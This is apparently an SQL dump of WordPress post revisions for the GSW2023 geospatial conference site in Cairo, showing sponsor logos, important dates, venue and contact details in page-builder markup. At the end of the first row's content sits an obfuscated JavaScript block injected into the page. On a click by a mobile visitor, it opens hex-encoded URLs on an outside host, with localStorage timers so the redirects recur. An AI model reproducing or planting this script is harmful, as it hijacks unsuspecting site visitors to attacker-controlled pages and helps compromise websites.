(4054,1,'2023-04-16 20:24:44','2023-04-16 20:24:44','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Payment of Registration Opened Now[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-16 20:24:44','2023-04-16 20:24:44','',3066,'https://gsw2023.com/?p=4054',0,'revision','',0),
(4055,1,'2023-04-16 20:25:30','2023-04-16 20:25:30','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a 